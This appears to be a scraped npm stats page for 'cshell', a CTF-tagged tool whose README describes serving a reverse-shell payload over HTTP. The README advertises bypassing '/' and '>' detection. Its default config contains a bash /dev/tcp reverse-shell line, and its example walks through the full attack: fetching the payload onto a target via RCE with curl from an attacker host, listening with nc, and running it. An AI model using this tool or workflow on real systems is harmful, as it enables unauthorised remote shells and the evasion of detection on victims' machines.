npm package discovery and stats viewer.

Discover Tips

  • General search

    [free text search, go nuts!]

  • Package details

    pkg:[package-name]

  • User packages

    @[username]

Sponsor

Optimize Toolset

I’ve always been into building performant and accessible sites, but lately I’ve been taking it extremely seriously. So much so that I’ve been building a tool to help me optimize and monitor the sites that I build to make sure that I’m making an attempt to offer the best experience to those who visit them. If you’re into performant, accessible and SEO friendly sites, you might like it too! You can check it out at Optimize Toolset.

About

Hi, 👋, I’m Ryan Hefner  and I built this site for me, and you! The goal of this site was to provide an easy way for me to check the stats on my npm packages, both for prioritizing issues and updates, and to give me a little kick in the pants to keep up on stuff.

As I was building it, I realized that I was actually using the tool to build the tool, and figured I might as well put this out there and hopefully others will find it to be a fast and useful way to search and browse npm packages as I have.

If you’re interested in other things I’m working on, follow me on Twitter or check out the open source projects I’ve been publishing on GitHub.

I am also working on a Twitter bot for this site to tweet the most popular, newest, random packages from npm. Please follow that account now and it will start sending out packages soon–ish.

Open Software & Tools

This site wouldn’t be possible without the immense generosity and tireless efforts from the people who make contributions to the world and share their work via open source initiatives. Thank you 🙏

© 2024 – Pkg Stats / Ryan Hefner

cshell

v1.1.4

Published

HTTP server for bounce shell downloading

Downloads

17

Vulnerabilities

Powered byPowered by Snyk
  • 0High
  • 0Medium
  • 0Low

Links

Git

Maintainers

cnily03cnily03

Keywords

bounceshellhackbashhackerctfctf-tools

Readme

CShell

This program could attach the file to the root path of the HTTP server.

Superiority

  • Bypass / and > detection and bounce the shell
  • Use-friendly and highly customized cli tool

Usage

Quick Start

Run

npm i -g cshell

Use

cshell

For more help, please try cshell --help.

From Source Code

Enter the source code directory. Install the dependencies.

npm ci

Install the cli tool globally.

npm link

Then you can directly use it on console every where. Try:

cshell

For more help, please try cshell --help.

Configuration

It is recommended to initialize the config by running following command.

cshell-conf <path>

<path> refers to the config. Each KV is optional, and it will fallback to the default value.

Default config file is as followings.

{
    // http server to visit
    "server-host": "127.0.0.1",
    "server-port": 54180,
    // master controller
    "shell-host": "127.0.0.1",
    "shell-port": 54188,
    // static directory
    "static": "",
    // file path whose content is attached
    "file": "",
    // content type of the file
    "content-type": "text/plain",
    // which content if file is not specified
    "default-file-content": "bash -i &> /dev/tcp/${{ env.shell_host }}/${{ env.shell_port }} 0>&1"
}

Note that ${{ something }} in the file content will be replaced to corresponding values. Specially, env has following sub-values:

  • server_host
  • server_port
  • shell_port
  • shell_port

Example

Run

cshell --host 12.34.56.78 --port 2020

Show

Server is running at port 2020...

- Try curl -o shell.sh 12.34.56.78:2020 on the target machine.
- Try nc -lvp 2020 on the master controller (12.34.56.78).

DO NOT forget to quit this process!!!

On the target machine to attack, run curl -o shell.sh 12.34.56.78:2020 via RCE. On console displays GET / FROM xx.xx.xx.xx.

Then we press Ctrl+C to quit the program and run nc -lvp 2020 on the master controller.

Attack the target machine by running bash shell.sh via RCE and we get the shell on the master controller.

License

MIT